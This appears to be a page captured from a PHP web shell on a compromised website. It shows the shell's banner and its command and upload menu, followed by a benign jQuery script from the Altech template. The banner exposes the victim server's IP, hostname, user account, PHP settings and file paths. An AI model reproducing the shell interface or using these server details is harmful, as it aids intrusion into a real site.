|
Server IP : 124.109.2.77 / Your IP : 216.73.216.49 Web Server : Apache/2 System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : cpctlp ( 1020) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341 OFF Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/Connections/../js/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
/** ==========================================================================================
Project : Altech - Responsive Multi-purpose HTML5 Template
Version : Bootstrap 4.1.1
Author : Themetechmount
========================================================================================== */
/** ===============
1. Preloader
2. TopSearch
3. Fixed-header
4. Menu
5. Number rotator
6. Enables menu toggle
7. Skillbar
8. Tab
9. Accordion
10. Isotope
11. Prettyphoto
12. owlCarousel
.. Services slide
.. Team slide
.. Testimonial slide2
.. Blog slide
.. Clients-slide
.. Portfolio-slide
.. Testimonial slide
.. Portfolio-img-slide
.. Clients-slide2
13. Back to top
=============== */
(function($) {
'use strict'
/*------------------------------------------------------------------------------*/
/* Preloader
/*------------------------------------------------------------------------------*/
// makes sure the whole site is loaded
$(window).on("load",function() {
// will first fade out the loading animation
$("#preloader").fadeOut();
// will fade out the whole DIV that covers the website.
$("#status").fadeOut(9000);
})
/*------------------------------------------------------------------------------*/
/* TopSearch
/*------------------------------------------------------------------------------*/
jQuery( ".ttm-header-search-link a" ).addClass('sclose');
jQuery( ".ttm-header-search-link a" ).on('click', function(event ) {
jQuery(".field.searchform-s").focus();
if (jQuery('.ttm-header-search-link a').hasClass('sclose')) {
jQuery( ".ttm-header-search-link a i" ).removeClass('ti-search').addClass('ti-close');
jQuery(this).removeClass('sclose').addClass('open');
jQuery(".ttm-search-overlay").addClass('st-show');
} else {
jQuery(this).removeClass('open').addClass('sclose');
jQuery( ".ttm-header-search-link a i" ).removeClass('ti-close').addClass('ti-search');
jQuery(".ttm-search-overlay").removeClass('st-show');
}
event.preventDefault();
});
/*------------------------------------------------------------------------------*/
/* Fixed-header
/*------------------------------------------------------------------------------*/
$(window).scroll(function(){
if ( matchMedia( 'only screen and (min-width: 1200px)' ).matches )
{
if ($(window).scrollTop() >= 50 ) {
$('.ttm-stickable-header').addClass('fixed-header');
$('.ttm-stickable-header').addClass('visible-title');
}
else {
$('.ttm-stickable-header').removeClass('fixed-header');
$('ttm-stickable-header').removeClass('visible-title');
}
}
});
/*------------------------------------------------------------------------------*/
/* Menu
/*------------------------------------------------------------------------------*/
$('ul li:has(ul)').addClass('has-submenu');
$('ul li ul').addClass('sub-menu');
$("ul.dropdown li").on({
mouseover: function(){
$(this).addClass("hover");
},
mouseout: function(){
$(this).removeClass("hover");
},
});
var $menu = $('#menu'), $menulink = $('#menu-toggle-form'), $menuTrigger = $('.has-submenu > a');
$menulink.on('click',function (e) {
$menulink.toggleClass('active');
$menu.toggleClass('active');
});
$menuTrigger.on('click',function (e) {
e.preventDefault();
var t = $(this);
t.toggleClass('active').next('ul').toggleClass('active');
});
$('ul li:has(ul)');
/*------------------------------------------------------------------------------*/
/* Animation on scroll: Number rotator
/*------------------------------------------------------------------------------*/
$("[data-appear-animation]").each(function() {
var self = $(this);
var animation = self.data("appear-animation");
var delay = (self.data("appear-animation-delay") ? self.data("appear-animation-delay") : 0);
if( $(window).width() > 959 ) {
self.html('0');
self.waypoint(function(direction) {
if( !self.hasClass('completed') ){
var from = self.data('from');
var to = self.data('to');
var interval = self.data('interval');
self.numinate({
format: '%counter%',
from: from,
to: to,
runningInterval: 2000,
stepUnit: interval,
onComplete: function(elem) {
self.addClass('completed');
}
});
}
}, { offset:'85%' });
} else {
if( animation == 'animateWidth' ) {
self.css('width', self.data("width"));
}
}
});
/*------------------------------------------------------------------------------*/
/* Skillbar
/*------------------------------------------------------------------------------*/
$('.ttm-progress-bar').each(function() {
$(this).find('.progress-bar').width(0);
});
$('.ttm-progress-bar').each(function() {
$(this).find('.progress-bar').animate({
width: $(this).attr('data-percent')
}, 2000);
});
// Part of the code responsible for loading percentages:
$('.progress-bar-percent[data-percentage]').each(function () {
var progress = $(this);
var percentage = Math.ceil($(this).attr('data-percentage'));
$({countNum: 0}).animate({countNum: percentage}, {
duration: 2000,
easing:'linear',
step: function() {
// What todo on every count
var pct = '';
if(percentage == 0){
pct = Math.floor(this.countNum) + '%';
}else{
pct = Math.floor(this.countNum+1) + '%';
}
progress.text(pct);
}
});
});
/*------------------------------------------------------------------------------*/
/* Tab
/*------------------------------------------------------------------------------*/
$('.ttm-tabs').each(function() {
$(this).children('.content-tab').children().hide();
$(this).children('.content-tab').children().first().show();
$(this).find('.tabs').children('li').on('click', function(e) {
var liActive = $(this).index(),
contentActive = $(this).siblings().removeClass('active').parents('.ttm-tabs').children('.content-tab').children().eq(liActive);
contentActive.addClass('active').fadeIn('slow');
contentActive.siblings().removeClass('active');
$(this).addClass('active').parents('.ttm-tabs').children('.content-tab').children().eq(liActive).siblings().hide();
e.preventDefault();
});
});
/*------------------------------------------------------------------------------*/
/* Accordion
/*------------------------------------------------------------------------------*/
/*https://www.antimath.info/jquery/quick-and-simple-jquery-accordion/*/
$(".accordion").each(function(){
var allPanels = $('.toggle').children(".toggle-content").hide();
$('.toggle').children(".toggle-content").eq(1).slideDown("easeOutExpo");
$('.toggle').children(".toggle-title").children("a").eq(1).addClass("active");
$('.toggle').children(".toggle-title").children("a").on('click', function(){
var current = $(this).parent().next(".toggle-content");
$(".toggle-title > a").removeClass("active");
$(this).addClass("active");
allPanels.not(current).slideUp("easeInExpo");
$(this).parent().next().slideDown("easeOutExpo");
return false;
});
});
/*------------------------------------------------------------------------------*/
/* Isotope
/*------------------------------------------------------------------------------*/
$(window).on('load', function() {
var $container = $('#isotopeContainer');
// filter items when filter link is clicked
$('#filters a').on('click', function(){
var selector = $(this).attr('data-filter');
$container.isotope({ filter: selector });
return false;
});
var $optionSets = $('#filters li'),
$optionLinks = $optionSets.find('a');
$optionLinks.on('click', function(){
var $this = $(this);
// don't proceed if already selected
if ( $this.hasClass('selected') ) {
return false;
}
var $optionSet = $this.parents('#filters');
$optionSet.find('.selected').removeClass('selected');
$this.addClass('selected');
// make option object dynamically, i.e. { filter: '.my-filter-class' }
var options = {},
key = $optionSet.attr('data-option-key'),
value = $this.attr('data-option-value');
// parse 'false' as false boolean
value = value === 'false' ? false : value;
options[ key ] = value;
if ( key === 'layoutMode' && typeof changeLayoutMode === 'function' ) {
// changes in layout modes need extra logic
changeLayoutMode( $this, options )
} else {
// otherwise, apply new options
$container.isotope( options );
}
return false;
});
});
/*------------------------------------------------------------------------------*/
/* Prettyphoto
/*------------------------------------------------------------------------------*/
jQuery(document).ready(function(){
// Normal link
jQuery('a[href*=".jpg"], a[href*=".jpeg"], a[href*=".png"], a[href*=".gif"]').each(function(){
if( jQuery(this).attr('target')!='_blank' && !jQuery(this).hasClass('prettyphoto') && !jQuery(this).hasClass('modula-lightbox') ){
var attr = $(this).attr('data-gal');
if (typeof attr !== typeof undefined && attr !== false && attr!='prettyPhoto' ) {
jQuery(this).attr('data-rel','prettyPhoto');
}
}
});
jQuery('a[data-gal^="prettyPhoto"]').prettyPhoto();
jQuery('a.ttm_prettyphoto').prettyPhoto();
jQuery('a[data-gal^="prettyPhoto"]').prettyPhoto();
jQuery("a[data-gal^='prettyPhoto']").prettyPhoto({hook: 'data-gal'})
});
/*------------------------------------------------------------------------------*/
/* owlCarousel
/*------------------------------------------------------------------------------*/
// =====1: history slide ====
$(".history-slide").owlCarousel({
loop:true,
margin:0,
nav: $('.history-slide').data('nav'),
dots: $('.history-slide').data('dots'),
autoplay: $('.history-slide').data('auto'),
smartSpeed: 3000,
responsive:{
0:{
items:1,
},
576:{
items:2,
},
768:{
items:3
},
992:{
items: $('.history-slide').data('item')
}
}
});
// =====2- Team slide ====
$(".team-slide").owlCarousel({
loop:true,
margin:0,
nav: $('.team-slide').data('nav'),
dots: $('.team-slide').data('dots'),
autoplay: $('.team-slide').data('auto'),
smartSpeed: 1000,
responsive:{
0:{
items:1,
},
480:{
items:2,
},
768:{
items:3
},
1200:{
items: $('.team-slide').data('item')
}
}
});
// =====3- Testimonial slide ====
$(".testimonial-slide").owlCarousel({
loop:true,
margin:0,
smartSpeed: 1000,
nav: $('.testimonial-slide').data('nav'),
dots: $('.testimonial-slide').data('dots'),
autoplay: $('.testimonial-slide').data('auto'),
responsive:{
0:{
items:1,
},
600:{
items:1,
},
1000:{
items: $('.testimonial-slide').data('item')
}
}
});
// ===== 4-Portfolio-slide ====
$(".portfolio-slide").owlCarousel({
margin: 0,
loop:true,
nav: $('.portfolio-slide').data('nav'),
dots: $('.portfolio-slide').data('dots'),
autoplay: $('.portfolio-slide').data('auto'),
smartSpeed: 3000,
responsive:{
0:{
items:1
},
576:{
items:2
},
768:{
items:3
},
992:{
items:4
},
1024:{
items: $('.portfolio-slide').data('item')
}
}
});
// ===== 5- Blog slide ====
$(".blog-slide").owlCarousel({
loop:true,
margin:0,
nav: $('.blog-slide').data('nav'),
dots: $('.blog-slide').data('dots'),
autoplay: $('.blog-slide').data('auto'),
smartSpeed: 3000,
responsive:{
0:{
items:1,
},
576:{
items:2,
},
992:{
items: $('.blog-slide').data('item')
}
}
});
// ===== 6- Clients-logo ====
$(".clients-slide").owlCarousel({
margin: 0,
loop:true,
nav: $('.clients-slide').data('nav'),
dots: $('.clients-slide').data('dots'),
autoplay: $('.clients-slide').data('auto'),
smartSpeed: 3000,
responsive:{
0:{
items:1
},
576:{
items:3
},
768:{
items:4
},
992:{
items: $('.clients-slide').data('item')
}
}
});
// ===== 6- services-slide ====
$(".services-slide").owlCarousel({
margin: 0,
loop:true,
nav: $('.services-slide').data('nav'),
dots: $('.services-slide').data('dots'),
autoplay: $('.services-slide').data('auto'),
smartSpeed: 3000,
responsive:{
0:{
items:1
},
680:{
items:2
},
992:{
items: $('.services-slide').data('item')
}
}
});
// =====7- Testimonial slide ====
$(".testimonial-slide2").owlCarousel({
loop:true,
margin:0,
smartSpeed: 1000,
nav: $('.testimonial-slide2').data('nav'),
dots: $('.testimonial-slide2').data('dots'),
autoplay: $('.testimonial-slide2').data('auto'),
responsive:{
0:{
items:1,
},
576:{
items:2,
},
1000:{
items: $('.testimonial-slide2').data('item')
}
}
});
// ===== 8- portfolio-img-slide ====
$(".portfolio-img-slide").owlCarousel({
margin: 0,
loop:true,
nav: $('.portfolio-img-slide').data('nav'),
dots: $('.portfolio-img-slide').data('dots'),
autoplay: $('.portfolio-img-slide').data('auto'),
smartSpeed: 1000,
responsive:{
0:{
items:1
},
480:{
items:1
},
991:{
items:1
},
1000:{
items: $('.portfolio-img-slide').data('item')
}
}
});
// ===== 9- project-slide ====
$(".project-slide").owlCarousel({
margin: 0,
loop:true,
nav: $('.project-slide').data('nav'),
dots: $('.project-slide').data('dots'),
autoplay: $('.project-slide').data('auto'),
smartSpeed: 1000,
responsive:{
0:{
items:1
},
480:{
items:1
},
991:{
items:1
},
1000:{
items: $('.project-slide').data('item')
}
}
});
// ===== 4-Portfolio-slide ====
$(".portfolio-slide2").owlCarousel({
margin: 0,
loop:true,
nav: $('.portfolio-slide2').data('nav'),
dots: $('.portfolio-slide2').data('dots'),
autoplay: $('.portfolio-slide2').data('auto'),
smartSpeed: 3000,
responsive:{
0:{
items:1
},
576:{
items:2
},
768:{
items:3
},
992:{
items:$('.portfolio-slide2').data('item')
}
}
});
/*------------------------------------------------------------------------------*/
/* Back to top
/*------------------------------------------------------------------------------*/
// ===== Scroll to Top ====
jQuery('#totop').hide();
jQuery(window).scroll(function() {
"use strict";
if (jQuery(this).scrollTop() >= 100) { // If page is scrolled more than 50px
jQuery('#totop').fadeIn(200); // Fade in the arrow
jQuery('#totop').addClass('top-visible');
} else {
jQuery('#totop').fadeOut(200); // Else fade out the arrow
jQuery('#totop').removeClass('top-visible');
}
});
jQuery('#totop').on('click', function() { // When arrow is clicked
jQuery('body,html').animate({
scrollTop : 0 // Scroll to top of body
}, 500);
return false;
});
$(function() {
});
})(jQuery);